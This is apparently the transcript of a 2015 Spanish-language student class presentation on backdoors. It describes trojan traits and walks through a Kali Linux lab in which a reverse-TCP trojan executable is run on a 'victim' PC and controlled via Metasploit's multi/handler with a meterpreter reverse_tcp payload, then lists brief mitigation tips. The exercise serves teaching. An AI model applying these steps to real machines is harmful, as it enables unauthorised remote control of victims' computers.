Backdoor

9
ACTIVIDAD ATAQUES Jorge Andres Vanegas Diego Fernando Paladinez Aprendices Grupo #2 William Navarro Núñez Instructor CENTRO DE ELECTRICIDAD, ELECTRONICA Y TELECOMUNICACIONES SENA BOGOTA 2015

description

acceso mediante virus

Transcript of Backdoor

Page 1: Backdoor

ACTIVIDAD ATAQUES

Jorge Andres Vanegas

Diego Fernando Paladinez

Aprendices

Grupo #2

William Navarro Núñez

Instructor

CENTRO DE ELECTRICIDAD, ELECTRONICA Y TELECOMUNICACIONES

SENA

BOGOTA

2015

Page 2: Backdoor

BACKDOOR

Un backdoor como su traducción lo dice es una puerta trasera, es un troyano que

permite acceder de forma remota a un host victima si hacer los procedimientos de

autenticación. Usa una estructura cliente servidor para realizar la conexión.

Para poder infectar a la víctima con un backdoor se hace uso de la ingeniería social

para que se pueda instalar el servidor que hará la conexión en ciertos tipos, en otros

se hace una conexión directa por medio de escanear puertos vulnerables.

Algunas de sus características más importantes son:

Son invisible para el usuario.

Se ejecutan en modo silencioso al iniciar el sistema.

Tiene acceso total a las funciones de host-victima.

Difícil eliminarlos del sistema ya que se instalan en carpetas de sistema,

registros o cualquier dirección.

Usa un programa blinder para configurar y disfrazar al servidor para que la

víctima no lo detecte fácilmente.

Ahora vamos a realizar un backdoor básico utilizando herramientas del sistema

operativo Kali Linux.

Primero que todo abrimos una terminal y ejecutamos el siguiente comando

Page 3: Backdoor

Con este comando creamos el troyano punto exe donde le especificamos el host

del atacante, el puerto por donde se va a conectar y definimos que la conexión que

realizamos para esto se utiliza reverse-tcp.

Ahora abrimos otra consola y escribimos el comando msfconsole.

Nos la consola msf donde encontramos muchos modulo pero para este ataque

utilizamos el módulo multi/handler

Page 4: Backdoor

Para completar este ataque tenemos que cambiar la configuración de este modulo,

esto se hace con el comando set payload windows/meterpreter/reverse_tcp.

Después ponemos nuestra dirección para eso aplicamos el comando set LHOST

(address)

Después de configurar el modulo le damos exploit –j para lanzar el ataque

Page 5: Backdoor

Ahora ya nos aparece el archivo ejecutable, con el que vamos a infectar la pc

victima.

Despues de pasar el troyano a una memoria lo ejecutamos en el pc de la victima.

Page 6: Backdoor

Aquí nos dice que el troyano ya ha sido ejecutado.

Para comprobar miramos la ip que tiene la victima.

Page 7: Backdoor

Iniciamos la sesión para poder controlar la pc de la victima.

Ya estando en la Shell de la víctima podemos ver su ip y ejecutar todos los

comandos.

Page 8: Backdoor

Nos sale la IP de la victima.

Otra prueba que hicimos fue crear una carpeta.

Page 9: Backdoor

MITIGACIÓN

Para poder mitigar este ataque tenemos varias recomendaciones:

Tener un buen anti-virus y tenerlo actualizado

Tener cuidado con las personas que puedan acceder a la pc

Ejecutar archivos solo si son 100% confiable

No instalar programas de dudosa reputación.

LINK DEL VIDEO

https://www.youtube.com/watch?v=3rTCxmAeLSY